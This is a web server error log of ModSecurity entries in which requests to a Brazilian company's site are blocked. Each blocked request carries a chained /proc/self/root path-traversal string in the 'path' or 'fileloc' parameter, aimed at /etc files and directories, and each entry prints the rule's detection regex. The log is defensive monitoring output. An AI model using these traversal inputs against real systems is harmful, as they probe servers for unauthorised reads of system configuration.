[Tue Mar 17 11:01:13.407117 2026] [:error] [pid 9299:tid 140411666392832] [client 74.7.241.46:59226] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/mime.types"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ableqb-sgTmmJoPuMdyniAAAAsk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:01:14.837282 2026] [:error] [pid 2325:tid 140411540502272] [client 74.7.243.203:43204] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablequ82sZHvlq4xgHrM8QAAApg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:01:19.412579 2026] [:error] [pid 2473:tid 140411641214720] [client 74.7.243.203:43212] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablerqBJNF7axNlVR0UFVAAAAAw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:01:21.396151 2026] [:error] [pid 7437:tid 140411658000128] [client 74.7.243.203:37452] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablesAeiSKl8TjouI-YKDQAAA8o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:01:24.187005 2026] [:error] [pid 18709:tid 140411733534464] [client 74.7.243.203:37468] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abletDarLhPAjZGI1b228AAAA4E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:01:26.642429 2026] [:error] [pid 18380:tid 140411649607424] [client 74.7.243.203:37474] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abletq4xEDsg_V3ESNY8agAAAgs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:01:27.183420 2026] [:error] [pid 2325:tid 140411557287680] [client 74.7.241.46:37774] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sestatus.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablet-82sZHvlq4xgHrM_QAAApY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:01:29.097891 2026] [:error] [pid 7437:tid 140411557287680] [client 74.7.243.203:37490] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ableuQeiSKl8TjouI-YKDwAAA9Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:01:30.417112 2026] [:error] [pid 18380:tid 140411674785536] [client 74.7.243.203:48350] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ableuq4xEDsg_V3ESNY8awAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:01:32.661540 2026] [:error] [pid 8856:tid 140411666392832] [client 74.7.243.203:48360] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ableu3UHeC6oxrTQ0VC3KAAAAck"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:01:37.531063 2026] [:error] [pid 8298:tid 140411725141760] [client 74.7.243.203:48372] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablewJdzf3e7m9lz3ZHPEgAAAQI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:01:38.987204 2026] [:error] [pid 8298:tid 140411565680384] [client 74.7.243.203:48384] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablewpdzf3e7m9lz3ZHPFQAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:01:40.539442 2026] [:error] [pid 9155:tid 140411557287680] [client 74.7.243.203:55058] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablexNbI7zhHXcabyMUuXAAAAlY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:01:44.062467 2026] [:error] [pid 2473:tid 140411557287680] [client 74.7.243.203:55070] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ableyKBJNF7axNlVR0UFXgAAABY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:01:48.366411 2026] [:error] [pid 2325:tid 140411699963648] [client 74.7.243.203:55072] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablezO82sZHvlq4xgHrNBAAAAoU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:01:49.731601 2026] [:error] [pid 18709:tid 140411557287680] [client 74.7.243.203:55080] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablezTarLhPAjZGI1b23CwAAA5Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:01:52.726072 2026] [:error] [pid 18709:tid 140411741927168] [client 74.7.241.46:57912] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/kdump.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "able0DarLhPAjZGI1b23EAAAA4A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:01:53.195666 2026] [:error] [pid 9299:tid 140411674785536] [client 74.7.243.203:32846] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "able0b-sgTmmJoPuMdynkQAAAsg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:01:54.555345 2026] [:error] [pid 7437:tid 140411607643904] [client 74.7.243.203:32848] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "able0geiSKl8TjouI-YKEwAAA9A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:01:55.746976 2026] [:error] [pid 7437:tid 140411708356352] [client 74.7.243.203:32852] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "able0weiSKl8TjouI-YKFQAAA8Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:01:58.027134 2026] [:error] [pid 2473:tid 140411666392832] [client 74.7.243.203:32858] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "able1aBJNF7axNlVR0UFYAAAAAk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
